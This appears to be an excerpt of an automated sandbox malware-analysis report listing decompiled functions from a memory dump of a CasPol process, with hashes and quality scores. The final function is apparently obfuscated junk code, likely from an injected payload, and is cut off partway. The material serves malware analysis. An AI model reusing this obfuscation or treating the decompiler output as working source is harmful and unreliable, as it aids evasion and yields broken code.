                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                				if(_t82 == 0) {
                                                                					_t62 = 0xc0000100;
                                                                				} else {
                                                                					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                					_t102 = 0xc0000100;
                                                                					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                					_t64 = 4;
                                                                					while(1) {
                                                                						 *(_t103 - 0x24) = _t64;
                                                                						if(_t64 == 0) {
                                                                							break;
                                                                						}
                                                                						_t87 = _t64 * 0xc;
                                                                						 *(_t103 - 0x2c) = _t87;
                                                                						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1601664));
                                                                						if(_t107 <= 0) {
                                                                							if(_t107 == 0) {
                                                                								_t79 = E0166E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1601668)), _t82);
                                                                								_t104 = _t104 + 0xc;
                                                                								__eflags = _t79;
                                                                								if(__eflags == 0) {
                                                                									_t102 = E016A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x160166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                									break;
                                                                								} else {
                                                                									_t64 =  *(_t103 - 0x24);
                                                                									goto L5;
                                                                								}
                                                                								goto L13;
                                                                							} else {
                                                                								L5:
                                                                								_t64 = _t64 - 1;
                                                                								continue;
                                                                							}
                                                                						}
                                                                						break;
                                                                					}
                                                                					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                					__eflags = _t102;
                                                                					if(_t102 < 0) {
                                                                						__eflags = _t102 - 0xc0000100;
                                                                						if(_t102 == 0xc0000100) {
                                                                							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                							__eflags = _t83;
                                                                							if(_t83 != 0) {
                                                                								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                								__eflags =  *_t83 - _t99;
                                                                								if( *_t83 == _t99) {
                                                                									_t102 = 0xc0000100;
                                                                									goto L19;
                                                                								} else {
                                                                									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                											L26:
                                                                											_t102 = E01652AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                											__eflags = _t102 - 0xc0000100;
                                                                											if(_t102 != 0xc0000100) {
                                                                												goto L12;
                                                                											} else {
                                                                												_t99 = 1;
                                                                												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                												goto L18;
                                                                											}
                                                                										} else {
                                                                											_t69 = E01636600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                											__eflags = _t69;
                                                                											if(_t69 != 0) {
                                                                												goto L26;
                                                                											} else {
                                                                												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                												goto L18;
                                                                											}
                                                                										}
                                                                									} else {
                                                                										L18:
                                                                										_t102 = E01652C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                										L19:
                                                                										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                										goto L12;
                                                                									}
                                                                								}
                                                                								L28:
                                                                							} else {
                                                                								E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                								_t76 = E01652AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                								__eflags = _t76 - 0xc0000100;
                                                                								if(_t76 == 0xc0000100) {
                                                                									 *((intOrPtr*)(_t103 - 0x1c)) = E01652C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                								}
                                                                								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                								E01652ACB();
                                                                							}
                                                                						}
                                                                					}
                                                                					L12:
                                                                					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                					_t62 = _t102;
                                                                				}
                                                                				L13:
                                                                				return E0167D0D1(_t62);
                                                                				goto L28;
                                                                			}






















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e88fd6d18ed8f21eaef6f8fb28e8a7812cef5730bf0e524de18c6d770e098a7
                                                                • Instruction ID: 5964b7388d5917e1aa5a1f9cdfd674016ee2a26c5fbb03f880254b5c7df0a615
                                                                • Opcode Fuzzy Hash: 1e88fd6d18ed8f21eaef6f8fb28e8a7812cef5730bf0e524de18c6d770e098a7
                                                                • Instruction Fuzzy Hash: F7515771A0021ADFDF66DF99CC90ADEBBB6BF48350F058159ED01AB320C3359952CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 85%
                                                                			E01654BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                				signed int _v8;
                                                                				short _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				char _v36;
                                                                				char _v156;
                                                                				short _v158;
                                                                				intOrPtr _v160;
                                                                				char _v164;
                                                                				intOrPtr _v168;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t45;
                                                                				intOrPtr _t74;
                                                                				signed char _t77;
                                                                				intOrPtr _t84;
                                                                				char* _t85;
                                                                				void* _t86;
                                                                				intOrPtr _t87;
                                                                				signed short _t88;
                                                                				signed int _t89;
                                                                
                                                                				_t83 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t89;
                                                                				_t45 = _a8 & 0x0000ffff;
                                                                				_v158 = __edx;
                                                                				_v168 = __ecx;
                                                                				if(_t45 == 0) {
                                                                					L22:
                                                                					_t86 = 6;
                                                                					L12:
                                                                					E0162CC50(_t86);
                                                                					L11:
                                                                					return E0166B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                				}
                                                                				_t77 = _a4;
                                                                				if((_t77 & 0x00000001) != 0) {
                                                                					goto L22;
                                                                				}
                                                                				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                				if(_t45 !=  *_t8) {
                                                                					goto L22;
                                                                				}
                                                                				_t9 = _t77 + 0x24; // 0x1718504
                                                                				E01642280(_t9, _t9);
                                                                				_t87 = 0x78;
                                                                				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                				E0166FA60( &_v156, 0, _t87);
                                                                				_t13 = _t77 + 0x30; // 0x3db8
                                                                				_t85 =  &_v156;
                                                                				_v36 =  *_t13;
                                                                				_v28 = _v168;
                                                                				_v32 = 0;
                                                                				_v24 = 0;
                                                                				_v20 = _v158;
                                                                				_v160 = 0;
                                                                				while(1) {
                                                                					_push( &_v164);
                                                                					_push(_t87);
                                                                					_push(_t85);
                                                                					_push(0x18);
                                                                					_push( &_v36);
                                                                					_push(0x1e);
                                                                					_t88 = E0166B0B0();
                                                                					if(_t88 != 0xc0000023) {
                                                                						break;
                                                                					}
                                                                					if(_t85 !=  &_v156) {
                                                                						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                					}
                                                                					_t84 = L01644620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                					_v168 = _v164;
                                                                					if(_t84 == 0) {
                                                                						_t88 = 0xc0000017;
                                                                						goto L19;
                                                                					} else {
                                                                						_t74 = _v160 + 1;
                                                                						_v160 = _t74;
                                                                						if(_t74 >= 0x10) {
                                                                							L19:
                                                                							_t86 = E0162CCC0(_t88);
                                                                							if(_t86 != 0) {
                                                                								L8:
                                                                								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                								_t30 = _t77 + 0x24; // 0x1718504
                                                                								E0163FFB0(_t77, _t84, _t30);
                                                                								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                								}
                                                                								if(_t86 != 0) {
                                                                									goto L12;
                                                                								} else {
                                                                									goto L11;
                                                                								}
                                                                							}
                                                                							L6:
                                                                							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                							if(_v164 != 0) {
                                                                								_t83 = _t84;
                                                                								E01654F49(_t77, _t84);
                                                                							}
                                                                							goto L8;
                                                                						}
                                                                						_t87 = _v168;
                                                                						continue;
                                                                					}
                                                                				}
                                                                				if(_t88 != 0) {
                                                                					goto L19;
                                                                				}
                                                                				goto L6;
                                                                			}



























                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bade290a37be359c74b238bdbc7fc7fb9bdfcb981f877e5eb85c58c14a067c48
                                                                • Instruction ID: a0759f153dec1b30f614cfd0cf76b2c32559973b879ba9c4a58a86ba7a6dc36c
                                                                • Opcode Fuzzy Hash: bade290a37be359c74b238bdbc7fc7fb9bdfcb981f877e5eb85c58c14a067c48
                                                                • Instruction Fuzzy Hash: 3E41BF31A002299BDF21DF68CD40BEE77B9EF49710F4100E9E908AB341EB349E80CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 78%
                                                                			E01654D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				signed int _v12;
                                                                				char _v176;
                                                                				char _v177;
                                                                				char _v184;
                                                                				intOrPtr _v192;
                                                                				intOrPtr _v196;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed short _t42;
                                                                				char* _t44;
                                                                				intOrPtr _t46;
                                                                				intOrPtr _t50;
                                                                				char* _t57;
                                                                				intOrPtr _t59;
                                                                				intOrPtr _t67;
                                                                				signed int _t69;
                                                                
                                                                				_t64 = __edx;
                                                                				_v12 =  *0x171d360 ^ _t69;
                                                                				_t65 = 0xa0;
                                                                				_v196 = __edx;
                                                                				_v177 = 0;
                                                                				_t67 = __ecx;
                                                                				_v192 = __ecx;
                                                                				E0166FA60( &_v176, 0, 0xa0);
                                                                				_t57 =  &_v176;
                                                                				_t59 = 0xa0;
                                                                				if( *0x1717bc8 != 0) {
                                                                					L3:
                                                                					while(1) {
                                                                						asm("movsd");
                                                                						asm("movsd");
                                                                						asm("movsd");
                                                                						asm("movsd");
                                                                						_t67 = _v192;
                                                                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                						_push( &_v184);
                                                                						_push(_t59);
                                                                						_push(_t57);
                                                                						_push(0xa0);
                                                                						_push(_t57);
                                                                						_push(0xf);
                                                                						_t42 = E0166B0B0();
                                                                						if(_t42 != 0xc0000023) {
                                                                							break;
                                                                						}
                                                                						if(_v177 != 0) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                						}
                                                                						_v177 = 1;
                                                                						_t44 = L01644620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                						_t59 = _v184;
                                                                						_t57 = _t44;
                                                                						if(_t57 != 0) {
                                                                							continue;
                                                                						} else {
                                                                							_t42 = 0xc0000017;
                                                                							break;
                                                                						}
                                                                					}
                                                                					if(_t42 != 0) {
                                                                						_t65 = E0162CCC0(_t42);
                                                                						if(_t65 != 0) {
                                                                							L10:
                                                                							if(_v177 != 0) {
                                                                								if(_t57 != 0) {
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                								}
                                                                							}
                                                                							_t46 = _t65;
                                                                							L12:
                                                                							return E0166B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                						}
                                                                						L7:
                                                                						_t50 = _a4;
                                                                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                						if(_t50 != 3) {
                                                                							if(_t50 == 2) {
                                                                								goto L8;
                                                                							}
                                                                							L9:
                                                                							if(E0166F380(_t67 + 0xc, 0x1605138, 0x10) == 0) {
                                                                								 *0x17160d8 = _t67;
                                                                							}
                                                                							goto L10;
                                                                						}
                                                                						L8:
                                                                						_t64 = _t57 + 0x28;
                                                                						E01654F49(_t67, _t57 + 0x28);
                                                                						goto L9;
                                                                					}
                                                                					_t65 = 0;
                                                                					goto L7;
                                                                				}
                                                                				if(E01654E70(0x17186b0, 0x1655690, 0, 0) != 0) {
                                                                					_t46 = E0162CCC0(_t56);
                                                                					goto L12;
                                                                				} else {
                                                                					_t59 = 0xa0;
                                                                					goto L3;
                                                                				}
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1373eea0602b5e57cbbf8d64f7d6047371f61a3f7c744381317b7fe0ea2ba976
                                                                • Instruction ID: 70659358f175ee2d2c53030309c8db400056f5492a0df43e6221f3906daaac24
                                                                • Opcode Fuzzy Hash: 1373eea0602b5e57cbbf8d64f7d6047371f61a3f7c744381317b7fe0ea2ba976
                                                                • Instruction Fuzzy Hash: 3741A471A443189FEB72DF18CC80FAAB7AAEB55610F0040D9ED4597381EB74ED84CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E016F2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
                                                                				char _v5;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed int _t30;
                                                                				signed int _t35;
                                                                				unsigned int _t50;
                                                                				signed int _t52;
                                                                				signed int _t53;
                                                                				unsigned int _t58;
                                                                				signed int _t61;
                                                                				signed int _t63;
                                                                				signed int _t67;
                                                                				signed int _t69;
                                                                				intOrPtr _t75;
                                                                				signed int _t81;
                                                                				signed int _t87;
                                                                				void* _t88;
                                                                				signed int _t90;
                                                                				signed int _t93;
                                                                
                                                                				_t69 = __ecx;
                                                                				_t30 = _a4;
                                                                				_t90 = __edx;
                                                                				_t81 = __ecx;
                                                                				_v12 = __ecx;
                                                                				_t87 = _t30 - 8;
                                                                				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
                                                                					_t87 = _t87 - 8;
                                                                				}
                                                                				_t67 = 0;
                                                                				if(_t90 != 0) {
                                                                					L14:
                                                                					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
                                                                						_t75 = (( *_t87 ^  *0x1716110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
                                                                						 *_a12 = _t75;
                                                                						_t35 = _a8 & 0x00000001;
                                                                						_v16 = _t35;
                                                                						if(_t35 == 0) {
                                                                							E01642280(_t35, _t81);
                                                                							_t81 = _v12;
                                                                						}
                                                                						_v5 = 0xff;
                                                                						if(( *_t87 ^  *0x1716110 ^ _t87) < 0) {
                                                                							_t91 = _v12;
                                                                							_t88 = E016F241A(_v12, _t90, _t87, _a8,  &_v5);
                                                                							if(_v16 == _t67) {
                                                                								E0163FFB0(_t67, _t88, _t91);
                                                                							}
                                                                							if(_t88 != 0) {
                                                                								E016F3209(_t91, _t88, _a8);
                                                                							}
                                                                							_t67 = 1;
                                                                						} else {
                                                                							_push(_t75);
                                                                							_push(_t67);
                                                                							E016EA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
                                                                							if(_v16 == _t67) {
                                                                								E0163FFB0(_t67, _t87, _v12);
                                                                							}
                                                                						}
                                                                					} else {
                                                                						_push(_t69);
                                                                						_push(_t67);
                                                                						E016EA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
                                                                					}
                                                                					return _t67;
                                                                				}
                                                                				_t69 =  *0x1716110; // 0x3951a168
                                                                				_t93 = _t87;
                                                                				_t50 = _t69 ^ _t87 ^  *_t87;
                                                                				if(_t50 >= 0) {
                                                                					_t52 = _t50 >> 0x00000010 & 0x00007fff;
                                                                					if(_t52 == 0) {
                                                                						L12:
                                                                						_t53 = _t67;
                                                                						L13:
                                                                						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
                                                                						goto L14;
                                                                					}
                                                                					_t93 = _t87 - (_t52 << 3);
                                                                					_t58 =  *_t93 ^ _t69 ^ _t93;
                                                                					if(_t58 < 0) {
                                                                						L10:
                                                                						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
                                                                						L11:
                                                                						_t53 = _t61 & 0x000000ff;
                                                                						goto L13;
                                                                					}
                                                                					_t63 = _t58 >> 0x00000010 & 0x00007fff;
                                                                					if(_t63 == 0) {
                                                                						goto L12;
                                                                					}
                                                                					_t93 = _t93 + _t63 * 0xfffffff8;
                                                                					goto L10;
                                                                				}
                                                                				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
                                                                				goto L11;
                                                                			}

























                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6b699327e609b907e79105ee7d7b8e1139f424f027b1325e26c6104998c33210
                                                                • Instruction ID: c74aed5d8f3275420c725367531facc4c84f1f29e1b9eff5d373a75635d4f973
                                                                • Opcode Fuzzy Hash: 6b699327e609b907e79105ee7d7b8e1139f424f027b1325e26c6104998c33210
                                                                • Instruction Fuzzy Hash: E0410672A101095BD714CE6CCCA0A7ABBA9EF48224B05866DEE15CB380D774DD02CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E016ED466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
                                                                				signed int _v8;
                                                                				char _v9;
                                                                				intOrPtr _v16;
                                                                				short _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				signed int _v40;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t53;
                                                                				signed int _t67;
                                                                				signed char _t75;
                                                                				short _t84;
                                                                				signed int _t87;
                                                                				short* _t89;
                                                                				unsigned int _t90;
                                                                				signed int _t95;
                                                                				void* _t98;
                                                                				signed int _t99;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t99;
                                                                				_t90 = __edx;
                                                                				_v36 = __ecx;
                                                                				_v20 = 0;
                                                                				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1716114 & 0x0000ffff;
                                                                				_v28 = 0;
                                                                				_t87 = E016EDDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1716114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1716114 & 0x0000ffff,  &_v9);
                                                                				_v32 = _t87;
                                                                				if(_t87 != 0xffffffff) {
                                                                					_t75 =  *(__edx + 0x1c) & 0x000000ff;
                                                                					_v20 = 1;
                                                                					_v16 = 1;
                                                                					 *0x171b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
                                                                					_t53 =  *( *(__ecx + 0xc) ^  *0x1716110 ^ __ecx)();
                                                                					_t69 = _t53;
                                                                					if(_t53 < 0) {
                                                                						_t88 = _v16;
                                                                					} else {
                                                                						_t69 = 0;
                                                                						_t98 = 0;
                                                                						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
                                                                						asm("sbb eax, eax");
                                                                						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
                                                                						if(_t67 > 0) {
                                                                							_t84 = _v20;
                                                                							do {
                                                                								if( *_t89 == _t69) {
                                                                									 *_t89 = _t84;
                                                                								}
                                                                								_t89 = _t89 + 2;
                                                                								_t98 = _t98 + 1;
                                                                							} while (_t98 < _t67);
                                                                						}
                                                                						goto L2;
                                                                						L18:
                                                                					}
                                                                				} else {
                                                                					_t69 = 0;
                                                                					L2:
                                                                					_t88 = _t69;
                                                                				}
                                                                				_t95 = _v28;
                                                                				if(_t95 != 0) {
                                                                					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
                                                                					asm("lock xadd [eax], esi");
                                                                				}
                                                                				if(_t88 != 0) {
                                                                					_t88 = _a4;
                                                                					E016ED864(_t90, _a4, _v40, 2, 0);
                                                                				}
                                                                				if(_v20 != 0) {
                                                                					E0163FFB0(_t69, _t90, _t90 + 0xc);
                                                                				}
                                                                				return E0166B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
                                                                				goto L18;
                                                                			}


























                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb9ae85ea23bd97059a1b8a21fce9955adad1ab49a8a286daf9953d36f460039
                                                                • Instruction ID: 08915a66e10a6b86bb89fa4406ad6beaaaf56ca962ffc70f497cd339b66dfc17
                                                                • Opcode Fuzzy Hash: bb9ae85ea23bd97059a1b8a21fce9955adad1ab49a8a286daf9953d36f460039
                                                                • Instruction Fuzzy Hash: 74419071E011299BDB10CFADCC85ABEB7F9FF88214B158269E915EB340D770AD05CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 70%
                                                                			E0042196F(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
                                                                				signed int _t14;
                                                                				signed int _t15;
                                                                				signed int _t18;
                                                                				signed char _t21;
                                                                				signed int _t23;
                                                                				signed int _t24;
                                                                
                                                                				_t23 = __esi;
                                                                				_t15 = __ebx;
                                                                				_t18 = __ecx ^  *0xeddb9ae9;
                                                                				asm("rcl dword [0xeb851e81], 0xa4");
                                                                				 *0x2028133e =  *0x2028133e >> 0xf5;
                                                                				asm("scasb");
                                                                				_t21 = __edx ^  *0x93ae58ce;
                                                                				if(_t21 < 0) {
                                                                					L1:
                                                                					asm("sbb [0xc36efb09], edx");
                                                                					asm("adc [0x767ba821], ebx");
                                                                					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
                                                                					_t14 = _t14 & 0x0000000c;
                                                                					_t24 = (_t24 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
                                                                					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
                                                                					asm("sbb ebp, [0x8771e3b]");
                                                                					_push(_t24);
                                                                					_t23 = _t23 &  *0x912dd0fb;
                                                                					_t21 = _t21 & 0x00000020;
                                                                					asm("rol byte [0xf89935f2], 0x22");
                                                                					asm("rol dword [0xfbe9540d], 0x6c");
                                                                					 *0x9459ca0a = _t18;
                                                                					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
                                                                					asm("adc bl, [0xc320ed3c]");
                                                                					asm("scasb");
                                                                					_t18 =  *0x9459ca0a - 1;
                                                                					 *0xaab74829 =  *0xaab74829 ^ _t14;
                                                                					asm("rcl dword [0x7f106817], 0x35");
                                                                					asm("adc eax, [0x9d56ea15]");
                                                                					_t15 = _t15 +  *0x5ceec7ba &  *0x3b22d9f7;
                                                                					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
                                                                					goto L1;
                                                                				}
                                                                				asm("rcl dword [0x5789a872], 0xac");
                                                                				_t6 = __esi;
                                                                				__esi =  *0xe184961e;
                                                                				 *0xe184961e = _t6;
                                                                				__ebp = __ebp - 1;
                                                                				 *0xd88934d1 =  *0xd88934d1 << 0xd5;
                                                                				asm("rol dword [0xabc0241b], 0x85");
                                                                				 *0xcab3817 =  *0xcab3817 - __ebx;
                                                                				__ebx = __ebx + 0x3a47b4a9;
                                                                				 *0xe5a61284 =  *0xe5a61284 - __dl;
                                                                				__ebx = __ebx - 1;
                                                                				asm("adc eax, [0x2024b9ef]");
                                                                				__eflags = __ecx -  *0x9210131;
                                                                				__ecx =  *0x9595246a * 0xc62b;
                                                                				_pop( *0xb8bb067);
                                                                				__esi =  *0xe184961e - 0xe193569b;
                                                                				__eflags = __esi;
                                                                				if(__esi >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esp = __esp ^  *0x11e49e73;
                                                                				__eflags = __ebp - 0x820b7505;
                                                                				__dl = __dl ^ 0x00000020;
                                                                				 *0xde59899 =  *0xde59899 - __esi;
                                                                				asm("movsw");
                                                                				 *0x750511e5 =  *0x750511e5 >> 0x68;
                                                                				__ebp = 0x456500e;
                                                                				__esp = __esp ^ 0x997ff93e;
                                                                				asm("sbb ah, 0xb4");
                                                                				 *0x1fa0e502 =  *0x1fa0e502 + __bl;
                                                                				__eflags =  *0x1fa0e502;
                                                                				if(__eflags < 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0x870eb172 = __edx;
                                                                				if(__eflags != 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("sbb [0xd4bd8f7a], edi");
                                                                				__eflags = __ch & 0x000000e7;
                                                                				 *0x2011f092 =  *0x2011f092 << 0x90;
                                                                				__eflags =  *0xb19a15c8 - __edi;
                                                                				__bl = __bl | 0x000000e1;
                                                                				_t9 = __ecx;
                                                                				__ecx =  *0x219367c5;
                                                                				 *0x219367c5 = _t9;
                                                                				__eax = __eax - 1;
                                                                				__eax - 0x16955a65 = 0x456500e - 0xadfadef0;
                                                                				 *0x34ca1624 =  *0x34ca1624 >> 0xb3;
                                                                				__dl = __dl - 0x12;
                                                                				__eflags =  *0xdb9f85e5 - __al;
                                                                				asm("rcl dword [0x2ef568bd], 0xd2");
                                                                				__edi =  *0xe45a9785;
                                                                				asm("rcl dword [0x15362087], 0x31");
                                                                				 *0x980d34cb =  *0x980d34cb & __eax;
                                                                				 *0xe91e0f97 =  *0xe91e0f97 << 0x9b;
                                                                				__bl = __bl ^  *0x13edb686;
                                                                				__eflags = __bl;
                                                                				if(__bl < 0) {
                                                                					goto L1;
                                                                				}
                                                                				__edx =  *0x5cd1287c * 0x8a10;
                                                                				__ecx = __ecx -  *0x7080472e;
                                                                				__esi = 0x593a2905;
                                                                				_t10 = __ch;
                                                                				__ch =  *0xa775b4f6;
                                                                				 *0xa775b4f6 = _t10;
                                                                				__esp = __esp |  *0x7ddfed1;
                                                                				__eflags = __esp;
                                                                				 *0x4e2bccf6 = 0xf2;
                                                                				if(__esp < 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esp = __esp | 0x09337e72;
                                                                				__esi =  *0x4f51fb6a * 0x77e7;
                                                                				__bl = __bl |  *0xa8badb6;
                                                                				 *0x221424a0 =  *0x221424a0 & __cl;
                                                                				 *0xaca990a =  *0xaca990a - __dh;
                                                                				__ebp = 0x456500d;
                                                                				asm("sbb esp, 0x2ac0173b");
                                                                				__bl =  *0x75d702b3;
                                                                				__eax =  *0xfaa4f03;
                                                                				__eflags =  *0x549368f6 & __cl;
                                                                				asm("adc [0x966f6d10], ah");
                                                                				_push( *0x4f51fb6a * 0x77e7);
                                                                				 *0xc0a4e224 =  *0xc0a4e224 >> 0xfe;
